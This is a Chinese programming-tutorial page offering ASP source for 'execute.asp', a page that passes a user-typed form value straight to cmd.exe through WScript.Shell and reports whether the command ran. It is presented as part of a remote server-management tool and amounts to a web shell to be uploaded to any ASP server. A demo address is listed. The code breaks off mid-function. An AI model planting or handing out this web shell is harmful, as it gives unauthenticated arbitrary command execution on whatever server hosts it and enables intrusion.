当前位置: 首页 > 图文教程 > 网络编程 > ASP > 可以执行系统命令的ASP原码放送

ASP
编写通用的asp防注入程序
vbs(asp)下的Function 语句
ASP中类Class相关内容的整理资料
字符批量替换程序asp服务器版
旁注-网站小助手旭方修改免杀asp版
用正则表达式写的HTML分离函数
asp中"无限流"分页程序代码
asp的一个日期格式化函数
asp中创建多级目录的两段代码
asp中去除内容HTML标签的三个function函数
chr(9)、chr(10)、chr(13)、chr(32)、chr(34)讲解
方便的大家admin及admin888 经过 md5加密后16位和32位代码
可用的ASP无重复数字随机函数, 数组实现, 并应用于随机显示记录集
asp动态级联菜单代码
ASP中经常使用的SQL语句与教程说明
实例分析之用ASP编程实现网络内容快速查找的代码
服务端 VBScript 与 JScript 几个相同特性的写法与示例
ASP 环境下 VBS 事件应用 示例代码
asp 之上传漏洞终结篇
asp中一段防SQL注入的通用脚本

可以执行系统命令的ASP原码放送


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-11-03   浏览: 115 ::
收藏到网摘: n/a

  最近正在写一个远程服务器管理的东东(借鉴了ASE的部分代码、增加了远程
执行命令、上传、服务等功能。),得到了阿新、ADAM、辰儿、ghost_happy、
crazybird等很多网友的帮助,让我很感动,所以我打算写好了以后,全部原代码公布,可以自由修改和散布。你所要做的只是上传程序到一个支持ASP的服务器。

值得注意的是,程序运行必须有FileSystemObject支持。以下是远程执行命令的
原代码。copy下来另存为execute.asp.

演示地址:http://210.160.4.24/scripts/execute.asp
一台日本的烂机,所以中文会出现乱码!

<html>

<head>
<meta http-equiv="Content-Language" content="zh-cn">
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>执行命令</title>
<style>
<!--
table,body{ font-family: 宋体; font-size: 9pt }
a{ font-family: 宋体; font-size: 9pt; color: rgb(0,32,64);

text-decoration: none }
a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: none

}
a:visited{ color: rgb(128,0,0) }
-->
</style>

</head>

<body bgcolor="#000000" text="#C0C0C0">

<form method="POST" action="execute.asp">
  <p align="left">输入要执行的命令:<input type="text" name="ml"

size="20" value="dir c:\" style="background-color: #C0C0C0; color:

#000000; border-style: solid; border-width: 1">
  <input type="submit" value="执行" name="B1" style="background-color:

#C0C0C0; color: #000000; border: 1 groove #C0C0C0"></p>  
</form>  
<%  
ml=request.form("ml")  
cmd="c:\winnt\system32\cmd.exe /c "&ml&" >c:\whoamI.txt" '修改

whoamI.txt路径到一个有写权限的目录
Set WShShell = Server.CreateObject("WScript.Shell")  
RetCode = WShShell.Run(cmd, 1, True)  
if RetCode = 0 Then  
    Response.write ml & " "
    Response.write " 命令成功执行!"&"<br><br>"  
else  
   Response.write " 命令执行失败!权限不够或者该程序无法在DOS状态下运行

!"&"<br><br>"  

end if  
'response.write cmd  
                  
function htmlencode(str)  
dim result  
dim l  
if isNULL(str) then   
htmlencode=""  
exit function  
end if  
l=len(str)  
result=""  
    dim i  
    for i = 1 to l  
     select case mid(str,i,1)  
     case "<"  
     result=result+"&lt;"  
     case ">"  
     result=result+"&gt;"  
     case chr(34)  
     result=result+"&quot;"  
     case "&"  
     result=result+"&amp;"  
     case else  
     result=result+mid(str,i,1)  
end select  
next   
htmlencode=result&nbs